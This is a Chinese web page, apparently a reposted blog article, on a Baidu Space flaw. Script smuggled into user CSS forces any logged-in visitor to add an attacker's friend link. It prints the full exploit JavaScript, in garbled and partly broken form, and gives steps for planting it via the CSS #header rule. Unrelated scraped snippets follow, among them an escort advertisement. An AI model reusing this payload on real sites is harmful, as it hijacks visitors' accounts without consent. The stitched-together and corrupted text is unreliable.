百度空间上线后,很多网友为了宣传自己的百度空间,疯狂复制css代码。但与此同时也出现了百度空间的 *** 黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户遭遇危险。
这是一个网友发来的短信求助,原文如下:
有个黑客用javascript把我的链接改了..并威胁我如果删除连接就删除我的空间,最怕的就是这样的人..我想问您了解一下他能用同样的手段篡改我页面的其他信息吗..更好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷..谢谢..
当时笔者找到该"黑客"的空间,轻松发现其利用css代码加入js代码,然后又利用js代码的功能,分析百度空间在提交数据时的参数,构造出来一个恶意的js代码,功能是提交一个加入友情链接的请求到百度空间,导致访问该网站的已登陆百度空间用户在自己空间上自动的加一个友情链接.
下边是利用代码:
javascript:document.body.onload=function(){ varreq=null; if(window.XMLHttpRequest)req=newXMLHttpRequest(); elseif(window.ActiveXObject){ varmsxml=newArray(’MSXML2.XMLHTTP.5.0’,’MSXML2.XMLHTTP.4.0’,’MSXML2.XMLHTTP.3.0’,’MSXML2.XMLHTTP’,’Microsoft.XMLHTTP’); for(vari=0;i try{req.overrideMimeType(’text/xml’)}catch(e){} } req.open(’get’,’.’,false); req.send(); vars=req.responseText; p=s.indexOf(’passport.baidu.com/?logout’); if(p>0) { p=s.indexOf(’’); if(p>0) { p=s.indexOf(’/’,p); p2=s.indexOf(String.fromCharCode(34),p); varuser=s.substring(p+1,p2); varname=’+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6’; varlink=’http://hi.baidu.com/haomm’; vardesc=’%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB’; varurl=’/’+user+’/commit’; vardata=’ct=6&cm=1&spRef=’+escape(’http://hi.baidu.com/’+user)+’%2Fmodify%2Fbuddylink%2F0&spBuddyName=’+escape(name)+’&spBuddyURL=’+escape(link)+’&spBuddyIntro=’+escape(desc); req.open(’post’,url,false); req.send(data); } } } |
分析:
该 *** 危险等级:高级.构造相应的js代码可以删除用户空间的所有数据.该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心.
解决办法:
由于攻击者可能利用任何用户名的百度空间提交增加,删除,更改的链接,所以目前没有完美解决办法.
给已经受害者解决办法:删除恶意链接,不再在登陆的情况下访问其空间链接.
利用 *** ,演示及声明:
本空间加入了该漏洞代码的利用演示,使用 *** :在自己空间css里面找到#header{},在里面加入上述代码即可.形式如:#header{height:200px;background:url("上文js代码");}请小心使用。
产品经理要将用户需求了解透彻应用到产品中,创造出用户与商业二合一的产品,这样的产品才会获得价值与利益,所以了解用户将是产品经理的一部分。 互联网让所有产品与用户的距离更加接近,这就使得了解用户需求的...
沈阳学生商务陪伴小学妹【华海燕】 今天给大家分享的内容是“沈阳学生商务陪伴小学妹【华海燕】”,我是华海燕,来自呼和浩特市,今年23岁,作为职业:北京模特伴游,我热爱我的职业:北京模特伴游。三圍:胸...
胃溃疡是常见的胃部疾病,主要是出现在胃角、胃窦、贲门和裂孔疝等部位的溃疡,常常会使患者出现胃部疼痛,反胃恶心等症状。因此,患上胃溃疡之后需要积极治疗。 在临床上,胃溃疡的诊断主要依靠典型的周期性...
陶朱公家训百思特网(陶朱公经商十八法五字商训三谋三略) 范蠡为中国早期商业理论家,被后人尊称为“商圣”,传说他帮助勾践兴越国,灭吴国,一雪会稽之耻。功成名就之后急流勇退,化名姓为鸱夷子皮,期间三...
手机被挖矿怎么办? 备份重要的数据和照片之后恢复出厂设置吧,不要安装不明来源的应用,另外权限设置里也尽量不要授权。可以刷机看一下行不行,还有电脑要按时清理内存才不会卡的。手机如果被挖矿,建议尝试重启后...
支付宝蚂蚁庄园小课堂2020年06月30日问题是什么?猫咪是常见的家养宠物,很多人都很喜欢猫咪,那么,你对猫咪了解多少呢?小鸡宝宝考考你,“猫咪睡觉时为什么把身体蜷成团?”还不知道正确答案的小伙伴一起...